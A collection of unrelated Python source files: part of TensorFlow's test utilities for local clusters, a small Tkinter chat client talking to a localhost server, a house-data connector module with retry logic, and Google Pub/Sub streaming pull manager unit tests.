"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
|
client.py | from tkinter import *
import requests
import threading
import time
root = Tk()
root.title("DSS Chat System")
name_label = Label(text="Name : ")
usr_name_entry = Entry()
message_field = Text()
message_input = Entry()
def threadStart():
thread1 = threading.Thread(target=getMessages)
thread1.start()
def getMessages():
while True:
final_message = ""
allMessages = requests.get("http://localhost:8000/show")
message_field.delete(1.0, "end")
my_json = (allMessages).json()
for i in my_json:
name = i["name"]
mes = i["message"]
final_message += f"{name} : {mes}\n"
message_field.insert(1.0, final_message)
time.sleep(1)
def sendMessage():
name = usr_name_entry.get()
message = message_input.get()
requests.get("http://localhost:8000" + f"?name={name}&message={message}")
message_input.delete(0, 'end')
submit_button = Button(text="Submit", command=sendMessage)
start_but = Button(text="Start", command=threadStart)
name_label.grid(row=0, column=0)
usr_name_entry.grid(row=0, column=1)
start_but.grid(row=0, column=2)
message_field.grid(row=1, column=0, columnspan=2)
message_input.grid(row=2, column=0, columnspan=2)
submit_button.grid(row=2, column=1)
root.mainloop()
|
Connector.py | """
Created on Okt 29 13:15 2019
@author: nishit
"""
import json
import threading
import time
from connector.apiConnectorFactory import ApiConnectorFactory
from connector.equationConnector import EquationConnector
from connector.equationParser import EquationParser
from connector.parserConnector import ParserConnector
from utils_intern.messageLogger import MessageLogger
logger = MessageLogger.get_logger_parent()
class Connector:
def __init__(self, config):
self.config = config
self.workers = config.getint("IO", "number.of.workers", fallback=2)
self.connector_list = []
self.active_sources = {}
for section in config.sections():
if section.startswith('HOUSE'):
self.active_sources[section] = False
threading.Thread(target=self.start_connector, args=(section,)).start()
equation_parser = EquationParser(config)
equation_list = equation_parser.read_all_equations()
logger.debug("######### Equation list = " + str(equation_list))
time.sleep(120)
for meta_eq in equation_list:
threading.Thread(target=self.start_equation, args=(meta_eq,)).start()
def start_connector(self, section):
repeat = 0
wait_time = 600
while not self.active_sources[section]:
if repeat > 0:
wait_time *= 2
if wait_time > 6*60*60:
wait_time = 6*60*60
logger.info("re-trying connection after "+str(wait_time)+" sec for house "+str(section))
time.sleep(wait_time)
try:
logger.info("House: " + section)
rec_url = self.config.get(section, "con.url", fallback=None)
rec_params = self.config.get(section, "con.topic", fallback=None)
if rec_url:
connector = ApiConnectorFactory.get_api_connector(section, rec_url, self.config, section)
self.connector_list.append(connector)
self.active_sources[section] = True
elif rec_params:
rec_params = json.loads(rec_params)
connector = ParserConnector(rec_params, self.workers, self.config, section)
self.connector_list.append(connector)
self.active_sources[section] = True
else:
self.active_sources[section] = False
except Exception as e:
logger.error(e)
repeat += 1
def start_equation(self, meta_eq):
repeat = 0
wait_time = 60
connector_started = False
all_sources_deaclred = True
while not connector_started and all_sources_deaclred:
if repeat > 0:
wait_time *= 2
if wait_time > 60*60:
wait_time = 60*60
logger.info("re-trying connection after "+str(wait_time)+" sec for eq "+str(meta_eq["name"]))
time.sleep(wait_time)
try:
all_sources_active = True
for source in meta_eq["sources"]:
logger.debug("### sour " + str(source))
if source not in self.active_sources.keys():
all_sources_deaclred = False
logger.debug("##### house "+str(source)+" data not declared in config")
break
elif not self.active_sources[source]:
all_sources_active = False
logger.debug("##### house " + str(source) + " not active yet")
if all_sources_deaclred and all_sources_active:
connector = EquationConnector(meta_eq, self.config)
self.connector_list.append(connector)
except Exception as e:
logger.error(e)
repeat += 1 |
test_streaming_pull_manager.py | # Copyright 2018, Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import logging
import threading
import time
import types as stdlib_types
import mock
import pytest
from google.api_core import bidi
from google.api_core import exceptions
from google.cloud.pubsub_v1 import types
from google.cloud.pubsub_v1.subscriber import client
from google.cloud.pubsub_v1.subscriber import message
from google.cloud.pubsub_v1.subscriber import scheduler
from google.cloud.pubsub_v1.subscriber._protocol import dispatcher
from google.cloud.pubsub_v1.subscriber._protocol import heartbeater
from google.cloud.pubsub_v1.subscriber._protocol import leaser
from google.cloud.pubsub_v1.subscriber._protocol import messages_on_hold
from google.cloud.pubsub_v1.subscriber._protocol import requests
from google.cloud.pubsub_v1.subscriber._protocol import streaming_pull_manager
from google.pubsub_v1 import types as gapic_types
import grpc
@pytest.mark.parametrize(
"exception,expected_cls",
[
(ValueError("meep"), ValueError),
(
mock.create_autospec(grpc.RpcError, instance=True),
exceptions.GoogleAPICallError,
),
({"error": "RPC terminated"}, Exception),
("something broke", Exception),
],
)
def test__wrap_as_exception(exception, expected_cls):
assert isinstance(
streaming_pull_manager._wrap_as_exception(exception), expected_cls
)
def test__wrap_callback_errors_no_error():
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock()
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
callback.assert_called_once_with(msg)
msg.nack.assert_not_called()
on_callback_error.assert_not_called()
def test__wrap_callback_errors_error():
callback_error = ValueError("meep")
msg = mock.create_autospec(message.Message, instance=True)
callback = mock.Mock(side_effect=callback_error)
on_callback_error = mock.Mock()
streaming_pull_manager._wrap_callback_errors(callback, on_callback_error, msg)
msg.nack.assert_called_once()
on_callback_error.assert_called_once_with(callback_error)
def test_constructor_and_default_state():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client, mock.sentinel.subscription
)
# Public state
assert manager.is_active is False
assert manager.flow_control == types.FlowControl()
assert manager.dispatcher is None
assert manager.leaser is None
assert manager.ack_histogram is not None
assert manager.ack_deadline == 10
assert manager.load == 0
# Private state
assert manager._client == mock.sentinel.client
assert manager._subscription == mock.sentinel.subscription
assert manager._scheduler is not None
assert manager._messages_on_hold is not None
assert manager._client_id is not None
def test_constructor_with_options():
manager = streaming_pull_manager.StreamingPullManager(
mock.sentinel.client,
mock.sentinel.subscription,
flow_control=mock.sentinel.flow_control,
scheduler=mock.sentinel.scheduler,
)
assert manager.flow_control == mock.sentinel.flow_control
assert manager._scheduler == mock.sentinel.scheduler
def make_manager(**kwargs):
client_ = mock.create_autospec(client.Client, instance=True)
scheduler_ = mock.create_autospec(scheduler.Scheduler, instance=True)
return streaming_pull_manager.StreamingPullManager(
client_, "subscription-name", scheduler=scheduler_, **kwargs
)
def fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10):
"""Add a simplified fake add() method to a leaser instance.
The fake add() method actually increases the leaser's internal message count
by one for each message, and the total bytes by ``assumed_msg_size`` for
each message (regardless of the actual message size).
"""
def fake_add(self, items):
self.message_count += len(items)
self.bytes += len(items) * assumed_msg_size
leaser.message_count = init_msg_count
leaser.bytes = init_msg_count * assumed_msg_size
leaser.add = stdlib_types.MethodType(fake_add, leaser)
def test_ack_deadline():
manager = make_manager()
assert manager.ack_deadline == 10
manager.ack_histogram.add(20)
assert manager.ack_deadline == 20
manager.ack_histogram.add(10)
assert manager.ack_deadline == 20
def test_client_id():
manager1 = make_manager()
request1 = manager1._get_initial_request(stream_ack_deadline_seconds=10)
client_id_1 = request1.client_id
assert client_id_1
manager2 = make_manager()
request2 = manager2._get_initial_request(stream_ack_deadline_seconds=10)
client_id_2 = request2.client_id
assert client_id_2
assert client_id_1 != client_id_2
def test_streaming_flow_control():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
request = manager._get_initial_request(stream_ack_deadline_seconds=10)
assert request.max_outstanding_messages == 10
assert request.max_outstanding_bytes == 1000
def test_streaming_flow_control_use_legacy_flow_control():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000),
use_legacy_flow_control=True,
)
request = manager._get_initial_request(stream_ack_deadline_seconds=10)
assert request.max_outstanding_messages == 0
assert request.max_outstanding_bytes == 0
def test_ack_deadline_with_max_duration_per_lease_extension():
manager = make_manager()
manager._flow_control = types.FlowControl(max_duration_per_lease_extension=5)
assert manager.ack_deadline == 5
for _ in range(5):
manager.ack_histogram.add(20)
assert manager.ack_deadline == 5
def test_maybe_pause_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_pause_consumer() # no raise
# Ensure load > 1
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 100
_leaser.bytes = 10000
manager.maybe_pause_consumer() # no raise
def test_lease_load_and_pause():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# This should mean that our messages count is at 10%, and our bytes
# are at 15%; load should return the higher (0.15), and shouldn't cause
# the consumer to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="one", byte_size=150, ordering_key="")]
)
assert manager.load == 0.15
manager.maybe_pause_consumer()
manager._consumer.pause.assert_not_called()
# After this message is added, the messages should be higher at 20%
# (versus 16% for bytes).
manager.leaser.add(
[requests.LeaseRequest(ack_id="two", byte_size=10, ordering_key="")]
)
assert manager.load == 0.2
# Returning a number above 100% is fine, and it should cause this to pause.
manager.leaser.add(
[requests.LeaseRequest(ack_id="three", byte_size=1000, ordering_key="")]
)
assert manager.load == 1.16
manager.maybe_pause_consumer()
manager._consumer.pause.assert_called_once()
def test_drop_and_resume():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._leaser = leaser.Leaser(manager)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = True
# Add several messages until we're over the load threshold.
manager.leaser.add(
[
requests.LeaseRequest(ack_id="one", byte_size=750, ordering_key=""),
requests.LeaseRequest(ack_id="two", byte_size=250, ordering_key=""),
]
)
assert manager.load == 1.0
# Trying to resume now should have no effect as we're over the threshold.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
# Drop the 200 byte message, which should put us under the resume
# threshold.
manager.leaser.remove(
[requests.DropRequest(ack_id="two", byte_size=250, ordering_key="")]
)
manager.maybe_resume_consumer()
manager._consumer.resume.assert_called_once()
def test_resume_not_paused():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_paused = False
# Resuming should have no effect is the consumer is not actually paused.
manager.maybe_resume_consumer()
manager._consumer.resume.assert_not_called()
def test_maybe_resume_consumer_wo_consumer_set():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager.maybe_resume_consumer() # no raise
def test__maybe_release_messages_on_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=11)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = msg.size
# Ensure load is exactly 1.0 (to verify that >= condition is used)
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 10
_leaser.bytes = 1000 + msg.size
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
manager._leaser.add.assert_not_called()
manager._scheduler.schedule.assert_not_called()
def test__maybe_release_messages_below_overload():
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
manager._callback = mock.sentinel.callback
# Init leaser message count to 11, so that when subtracting the 3 messages
# that are on hold, there is still room for another 2 messages before the
# max load is hit.
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
fake_leaser_add(_leaser, init_msg_count=11, assumed_msg_size=10)
messages = [
mock.create_autospec(message.Message, instance=True, ack_id="ack_foo", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_bar", size=10),
mock.create_autospec(message.Message, instance=True, ack_id="ack_baz", size=10),
]
for msg in messages:
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 3 * 10
# the actual call of MUT
manager._maybe_release_messages()
assert manager._messages_on_hold.size == 1
msg = manager._messages_on_hold.get()
assert msg.ack_id == "ack_baz"
schedule_calls = manager._scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for _, call_args, _ in schedule_calls:
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].ack_id in ("ack_foo", "ack_bar")
def test__maybe_release_messages_negative_on_hold_bytes_warning(caplog):
manager = make_manager(
flow_control=types.FlowControl(max_messages=10, max_bytes=1000)
)
msg = mock.create_autospec(message.Message, instance=True, ack_id="ack", size=17)
manager._messages_on_hold.put(msg)
manager._on_hold_bytes = 5 # too low for some reason
_leaser = manager._leaser = mock.create_autospec(leaser.Leaser)
_leaser.message_count = 3
_leaser.bytes = 150
with caplog.at_level(logging.WARNING):
manager._maybe_release_messages()
expected_warnings = [
record.message.lower()
for record in caplog.records
if "unexpectedly negative" in record.message
]
assert len(expected_warnings) == 1
assert "on hold bytes" in expected_warnings[0]
assert "-12" in expected_warnings[0]
assert manager._on_hold_bytes == 0 # should be auto-corrected
def test_send_unary():
manager = make_manager()
manager.send(
gapic_types.StreamingPullRequest(
ack_ids=["ack_id1", "ack_id2"],
modify_deadline_ack_ids=["ack_id3", "ack_id4", "ack_id5"],
modify_deadline_seconds=[10, 20, 20],
)
)
manager._client.acknowledge.assert_called_once_with(
subscription=manager._subscription, ack_ids=["ack_id1", "ack_id2"]
)
manager._client.modify_ack_deadline.assert_has_calls(
[
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id3"],
ack_deadline_seconds=10,
),
mock.call(
subscription=manager._subscription,
ack_ids=["ack_id4", "ack_id5"],
ack_deadline_seconds=20,
),
],
any_order=True,
)
def test_send_unary_empty():
manager = make_manager()
manager.send(gapic_types.StreamingPullRequest())
manager._client.acknowledge.assert_not_called()
manager._client.modify_ack_deadline.assert_not_called()
def test_send_unary_api_call_error(caplog):
caplog.set_level(logging.DEBUG)
manager = make_manager()
error = exceptions.GoogleAPICallError("The front fell off")
manager._client.acknowledge.side_effect = error
manager.send(gapic_types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "The front fell off" in caplog.text
def test_send_unary_retry_error(caplog):
caplog.set_level(logging.DEBUG)
manager, _, _, _, _, _ = make_running_manager()
error = exceptions.RetryError(
"Too long a transient error", cause=Exception("Out of time!")
)
manager._client.acknowledge.side_effect = error
with pytest.raises(exceptions.RetryError):
manager.send(gapic_types.StreamingPullRequest(ack_ids=["ack_id1", "ack_id2"]))
assert "RetryError while sending unary RPC" in caplog.text
assert "signaled streaming pull manager shutdown" in caplog.text
def test_heartbeat():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = True
result = manager.heartbeat()
manager._rpc.send.assert_called_once_with(gapic_types.StreamingPullRequest())
assert result
def test_heartbeat_inactive():
manager = make_manager()
manager._rpc = mock.create_autospec(bidi.BidiRpc, instance=True)
manager._rpc.is_active = False
manager.heartbeat()
result = manager._rpc.send.assert_not_called()
assert not result
@mock.patch("google.api_core.bidi.ResumableBidiRpc", autospec=True)
@mock.patch("google.api_core.bidi.BackgroundConsumer", autospec=True)
@mock.patch("google.cloud.pubsub_v1.subscriber._protocol.leaser.Leaser", autospec=True)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.dispatcher.Dispatcher", autospec=True
)
@mock.patch(
"google.cloud.pubsub_v1.subscriber._protocol.heartbeater.Heartbeater", autospec=True
)
def test_open(heartbeater, dispatcher, leaser, background_consumer, resumable_bidi_rpc):
manager = make_manager()
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
heartbeater.assert_called_once_with(manager)
heartbeater.return_value.start.assert_called_once()
assert manager._heartbeater == heartbeater.return_value
dispatcher.assert_called_once_with(manager, manager._scheduler.queue)
dispatcher.return_value.start.assert_called_once()
assert manager._dispatcher == dispatcher.return_value
leaser.assert_called_once_with(manager)
leaser.return_value.start.assert_called_once()
assert manager.leaser == leaser.return_value
background_consumer.assert_called_once_with(manager._rpc, manager._on_response)
background_consumer.return_value.start.assert_called_once()
assert manager._consumer == background_consumer.return_value
resumable_bidi_rpc.assert_called_once_with(
start_rpc=manager._client.api.streaming_pull,
initial_request=mock.ANY,
should_recover=manager._should_recover,
should_terminate=manager._should_terminate,
throttle_reopen=True,
)
initial_request_arg = resumable_bidi_rpc.call_args.kwargs["initial_request"]
assert initial_request_arg.func == manager._get_initial_request
assert initial_request_arg.args[0] == 10 # the default stream ACK timeout
assert not manager._client.api.get_subscription.called
resumable_bidi_rpc.return_value.add_done_callback.assert_called_once_with(
manager._on_rpc_done
)
assert manager._rpc == resumable_bidi_rpc.return_value
manager._consumer.is_active = True
assert manager.is_active is True
def test_open_already_active():
manager = make_manager()
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
with pytest.raises(ValueError, match="already open"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def test_open_has_been_closed():
manager = make_manager()
manager._closed = True
with pytest.raises(ValueError, match="closed"):
manager.open(mock.sentinel.callback, mock.sentinel.on_callback_error)
def make_running_manager(**kwargs):
manager = make_manager(**kwargs)
manager._consumer = mock.create_autospec(bidi.BackgroundConsumer, instance=True)
manager._consumer.is_active = True
manager._dispatcher = mock.create_autospec(dispatcher.Dispatcher, instance=True)
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._heartbeater = mock.create_autospec(heartbeater.Heartbeater, instance=True)
return (
manager,
manager._consumer,
manager._dispatcher,
manager._leaser,
manager._heartbeater,
manager._scheduler,
)
def test_close():
(
manager,
consumer,
dispatcher,
leaser,
heartbeater,
scheduler,
) = make_running_manager()
manager.close()
consumer.stop.assert_called_once()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
assert manager.is_active is False
def test_close_inactive_consumer():
(
manager,
consumer,
dispatcher,
leaser,
heartbeater,
scheduler,
) = make_running_manager()
consumer.is_active = False
manager.close()
consumer.stop.assert_not_called()
leaser.stop.assert_called_once()
dispatcher.stop.assert_called_once()
heartbeater.stop.assert_called_once()
scheduler.shutdown.assert_called_once()
def test_close_idempotent():
manager, _, _, _, _, scheduler = make_running_manager()
manager.close()
manager.close()
assert scheduler.shutdown.call_count == 1
class FakeDispatcher(object):
def __init__(self, manager, error_callback):
self._manager = manager
self._error_callback = error_callback
self._thread = None
self._stop = False
def start(self):
self._thread = threading.Thread(target=self._do_work)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._stop = True
self._thread.join()
self._thread = None
def _do_work(self):
while not self._stop:
try:
self._manager.leaser.add([mock.Mock()])
except Exception as exc: # pragma: NO COVER
self._error_callback(exc)
time.sleep(0.1)
# also try to interact with the leaser after the stop flag has been set
try:
self._manager.leaser.remove([mock.Mock()])
except Exception as exc: # pragma: NO COVER
self._error_callback(exc)
def test_close_no_dispatcher_error():
manager, _, _, _, _, _ = make_running_manager()
error_callback = mock.Mock(name="error_callback")
dispatcher = FakeDispatcher(manager=manager, error_callback=error_callback)
manager._dispatcher = dispatcher
dispatcher.start()
manager.close()
error_callback.assert_not_called()
def test_close_callbacks():
manager, _, _, _, _, _ = make_running_manager()
callback = mock.Mock()
manager.add_close_callback(callback)
manager.close(reason="meep")
callback.assert_called_once_with(manager, "meep")
def test_close_blocking_scheduler_shutdown():
manager, _, _, _, _, _ = make_running_manager(await_callbacks_on_shutdown=True)
scheduler = manager._scheduler
manager.close()
scheduler.shutdown.assert_called_once_with(await_msg_callbacks=True)
def test_close_nonblocking_scheduler_shutdown():
manager, _, _, _, _, _ = make_running_manager(await_callbacks_on_shutdown=False)
scheduler = manager._scheduler
manager.close()
scheduler.shutdown.assert_called_once_with(await_msg_callbacks=False)
def test_close_nacks_internally_queued_messages():
nacked_messages = []
def fake_nack(self):
nacked_messages.append(self.data)
MockMsg = functools.partial(mock.create_autospec, message.Message, instance=True)
messages = [MockMsg(data=b"msg1"), MockMsg(data=b"msg2"), MockMsg(data=b"msg3")]
for msg in messages:
msg.nack = stdlib_types.MethodType(fake_nack, msg)
manager, _, _, _, _, _ = make_running_manager()
dropped_by_scheduler = messages[:2]
manager._scheduler.shutdown.return_value = dropped_by_scheduler
manager._messages_on_hold._messages_on_hold.append(messages[2])
manager.close()
assert sorted(nacked_messages) == [b"msg1", b"msg2", b"msg3"]
def test__get_initial_request():
manager = make_manager()
manager._leaser = mock.create_autospec(leaser.Leaser, instance=True)
manager._leaser.ack_ids = ["1", "2"]
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, gapic_types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == ["1", "2"]
assert initial_request.modify_deadline_seconds == [10, 10]
def test__get_initial_request_wo_leaser():
manager = make_manager()
manager._leaser = None
initial_request = manager._get_initial_request(123)
assert isinstance(initial_request, gapic_types.StreamingPullRequest)
assert initial_request.subscription == "subscription-name"
assert initial_request.stream_ack_deadline_seconds == 123
assert initial_request.modify_deadline_ack_ids == []
assert initial_request.modify_deadline_seconds == []
def test__on_response_delivery_attempt():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = gapic_types.StreamingPullResponse(
received_messages=[
gapic_types.ReceivedMessage(
ack_id="fack",
message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
),
gapic_types.ReceivedMessage(
ack_id="back",
message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
delivery_attempt=6,
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
manager._on_response(response)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
msg1 = schedule_calls[0][1][1]
assert msg1.delivery_attempt is None
msg2 = schedule_calls[1][1][1]
assert msg2.delivery_attempt == 6
def test__on_response_no_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = gapic_types.StreamingPullResponse(
received_messages=[
gapic_types.ReceivedMessage(
ack_id="fack",
message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
),
gapic_types.ReceivedMessage(
ack_id="back",
message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
),
]
)
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=42)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
dispatcher.modify_ack_deadline.assert_called_once_with(
[requests.ModAckRequest("fack", 10), requests.ModAckRequest("back", 10)]
)
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
for call in schedule_calls:
assert call[1][0] == mock.sentinel.callback
assert isinstance(call[1][1], message.Message)
# the leaser load limit not hit, no messages had to be put on hold
assert manager._messages_on_hold.size == 0
def test__on_response_with_leaser_overload():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = gapic_types.StreamingPullResponse(
received_messages=[
gapic_types.ReceivedMessage(
ack_id="fack",
message=gapic_types.PubsubMessage(data=b"foo", message_id="1"),
),
gapic_types.ReceivedMessage(
ack_id="back",
message=gapic_types.PubsubMessage(data=b"bar", message_id="2"),
),
gapic_types.ReceivedMessage(
ack_id="zack",
message=gapic_types.PubsubMessage(data=b"baz", message_id="3"),
),
]
)
# Adjust message bookkeeping in leaser. Pick 999 messages, which is just below
# the default FlowControl.max_messages limit.
fake_leaser_add(leaser, init_msg_count=999, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule
# are called in the expected way.
manager._on_response(response)
# all messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# one message should be scheduled, the flow control limits allow for it
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 1
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
# the rest of the messages should have been put on hold
assert manager._messages_on_hold.size == 2
while True:
msg = manager._messages_on_hold.get()
if msg is None:
break
else:
assert isinstance(msg, message.Message)
assert msg.message_id in ("2", "3")
def test__on_response_none_data(caplog):
caplog.set_level(logging.DEBUG)
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# adjust message bookkeeping in leaser
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
manager._on_response(response=None)
scheduler.schedule.assert_not_called()
assert "callback invoked with None" in caplog.text
def test__on_response_with_ordering_keys():
manager, _, dispatcher, leaser, _, scheduler = make_running_manager()
manager._callback = mock.sentinel.callback
# Set up the messages.
response = gapic_types.StreamingPullResponse(
received_messages=[
gapic_types.ReceivedMessage(
ack_id="fack",
message=gapic_types.PubsubMessage(
data=b"foo", message_id="1", ordering_key=""
),
),
gapic_types.ReceivedMessage(
ack_id="back",
message=gapic_types.PubsubMessage(
data=b"bar", message_id="2", ordering_key="key1"
),
),
gapic_types.ReceivedMessage(
ack_id="zack",
message=gapic_types.PubsubMessage(
data=b"baz", message_id="3", ordering_key="key1"
),
),
]
)
# Make leaser with zero initial messages, so we don't test lease management
# behavior.
fake_leaser_add(leaser, init_msg_count=0, assumed_msg_size=10)
# Actually run the method and prove that modack and schedule are called in
# the expected way.
manager._on_response(response)
# All messages should be added to the lease management and have their ACK
# deadline extended, even those not dispatched to callbacks.
dispatcher.modify_ack_deadline.assert_called_once_with(
[
requests.ModAckRequest("fack", 10),
requests.ModAckRequest("back", 10),
requests.ModAckRequest("zack", 10),
]
)
# The first two messages should be scheduled, The third should be put on
# hold because it's blocked by the completion of the second, which has the
# same ordering key.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 2
call_args = schedule_calls[0][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "1"
call_args = schedule_calls[1][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "2"
# Message 3 should have been put on hold.
assert manager._messages_on_hold.size == 1
# No messages available because message 2 (with "key1") has not completed yet.
assert manager._messages_on_hold.get() is None
# Complete message 2 (with "key1").
manager.activate_ordering_keys(["key1"])
# Completing message 2 should release message 3.
schedule_calls = scheduler.schedule.mock_calls
assert len(schedule_calls) == 3
call_args = schedule_calls[2][1]
assert call_args[0] == mock.sentinel.callback
assert isinstance(call_args[1], message.Message)
assert call_args[1].message_id == "3"
# No messages available in the queue.
assert manager._messages_on_hold.get() is None
def test__should_recover_true():
manager = make_manager()
details = "UNAVAILABLE. Service taking nap."
exc = exceptions.ServiceUnavailable(details)
assert manager._should_recover(exc) is True
def test__should_recover_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_recover(exc) is False
def test__should_terminate_true():
manager = make_manager()
details = "Cancelled. Go away, before I taunt you a second time."
exc = exceptions.Cancelled(details)
assert manager._should_terminate(exc) is True
